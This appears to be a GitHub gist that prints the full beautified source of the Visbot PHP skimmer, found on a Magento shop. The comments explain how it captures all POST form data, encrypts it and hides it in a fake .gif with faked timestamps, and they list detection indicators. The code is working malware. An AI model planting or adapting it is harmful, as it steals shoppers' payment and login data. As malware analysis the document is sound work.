visbot-beautified.php
<?PHP
// Hard-coded configuration of the skimmer.
// $y0: drop file that receives the captured data. It carries a .gif name and sits in what looks
//      like a Magento 1 admin skin image directory (inferred from the path layout), so it blends
//      in with static assets.
$y0 = '/var/www/vhosts/redacted.nl/httpdocs/skin/adminhtml/default/default/images/left_button_back.gif';
// $m1: fallback Unix timestamp, applied to the drop file via touch() when the file does not exist yet.
$m1 = '1382961301';
// $k2: name of the GET parameter that switches the control request from "ping" to "wipe the drop file".
$k2 = 'pa89785e';
// $k3: RSA public key used to wrap the per-request session key. Only the holder of the matching
//      private key can decrypt what is written to the drop file.
$k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----";
// Control channel, gated on an exact User-Agent string.
// Detection: requests carrying this User-Agent in the access logs, and response bodies that are
// exactly 'Pong' or 'clean ok', are indicators that this code is present and being polled.
if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)') {
// With the $k2 query parameter present, the drop file is emptied.
if (isset($_GET[$k2])) {
// Remember the file's current mtime (or the hard-coded fallback if the file is missing) ...
$m1 = file_exists($y0) ? @filemtime($y0) : $m1;
// ... truncate the drop file, errors suppressed ...
@file_put_contents($y0, '');
// ... and set atime/mtime back, so the write does not show up as a recent modification.
// Hashing or content inspection is needed to notice the change; mtime alone will not show it.
@touch($y0, $m1, $m1);
echo 'clean ok';
} else
// Without the parameter the request is only a liveness check.
echo 'Pong';
// Reached on both paths: a request with the control User-Agent never runs the capture code below.
exit;
}
// Choose the address recorded with each capture: Client-IP header first, then X-Forwarded-For,
// then REMOTE_ADDR. The two headers are supplied by the client or an intermediary, so the stored
// value is not reliable evidence of where a request came from.
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$i4 = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$i4 = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
// @ hides the notice when REMOTE_ADDR is not set.
$i4 = @$_SERVER['REMOTE_ADDR'];
}
// Capture step: every POST request that reaches this script has its fields flattened into one
// string of the form  <ip>:name=value:name[key]=value:name[key][key]=value ...
// Nothing is filtered by field name, so whatever forms post through this entry point (logins,
// checkout or payment fields, admin actions) is recorded. That is the scope to assume during
// incident response.
if (isset($_POST) && sizeof($_POST)) {
$a5 = '';
foreach ($_POST as $h6 => $n7) {
if (is_array($n7)) {
foreach ($n7 as $f8 => $l9) {
if (is_array($l9)) {
foreach ($l9 as $l10 => $v11) {
if (is_array($v11)) {
// Arrays nested more than three levels deep are skipped.
;
} else {
$a5 .= ':' . $h6 . '[' . $f8 . '][' . $l10 . ']=' . $v11;
}
}
} else {
$a5 .= ':' . $h6 . '[' . $f8 . ']=' . $l9;
}
}
} else {
$a5 .= ':' . $h6 . '=' . $n7;
}
}
// Prefix the record with the address chosen earlier.
$a5 = $i4 . $a5;
} else {
// No POST data: nothing is written for this request.
$a5 = null;
}
// Storage step: encrypt the flattened record when OpenSSL is usable, then append it to the drop file.
if ($a5) {
// $t12 records whether the three OpenSSL functions used below are available.
$t12 = false;
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists('openssl_encrypt')) {
$t12 = true;
} elseif (function_exists('dl')) {
// Fallback: attempt to load the OpenSSL extension at runtime (php_openssl.dll when php_uname()
// starts with "win", php_openssl.so otherwise), then re-check for the functions.
$n13 = strtolower(substr(php_uname(), 0, 3));
$d14 = 'php_openssl.' . ($n13 == 'win' ? 'dll' : 'so');
@dl($d14);
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists('openssl_encrypt')) {
$t12 = true;
}
}
if ($t12) {
// Hybrid encryption: a per-request session key is wrapped with the embedded RSA public key and
// the record itself is encrypted with AES-128 under that session key.
$t15 = @openssl_get_publickey($k3);
// Chunk size for the RSA step.
$q16 = 128;
$t17 = '';
// Session key: an md5 hex digest (32 characters) derived from microtime() and rand().
$h18 = md5(md5(microtime()) . rand());
$e19 = $h18;
// RSA-encrypt the session key in chunks of up to $q16 bytes. With a 32-character key this is a
// single chunk.
while ($e19) {
$f20 = substr($e19, 0, $q16);
$e19 = substr($e19, $q16);
@openssl_public_encrypt($f20, $h21, $t15);
$t17 .= $h21;
}
$t22 = @openssl_encrypt($a5, 'aes128', $h18);
@openssl_free_key($t15);
// Record layout before base64: <RSA-wrapped key> ':::SEP:::' <AES ciphertext>.
$a5 = $t17 . ':::SEP:::' . $t22;
}
// When OpenSSL is unavailable $a5 is still the plaintext record, so the file then holds captured
// form data that is only base64-encoded and readable by anyone who can fetch or read the file.
// Same mtime handling as the control branch: remember mtime, write, then put it back.
$m1 = file_exists($y0) ? @filemtime($y0) : $m1;
// Each record is appended as the literal marker 'JPEG-1.1' followed by base64 text.
// Detection: image files under the web root that contain 'JPEG-1.1', or a .gif that does not
// start with a GIF header, are worth flagging.
@file_put_contents($y0, 'JPEG-1.1' . base64_encode($a5), FILE_APPEND);
// touch() resets atime/mtime only. On POSIX filesystems the inode change time (ctime) cannot be
// set this way, so ctime and content hashes remain usable for spotting the write.
@touch($y0, $m1, $m1);
}
?><?php
ngctombs commented Dec 2, 2016

Thank you for publicizing this Willem, keep up the great research work!
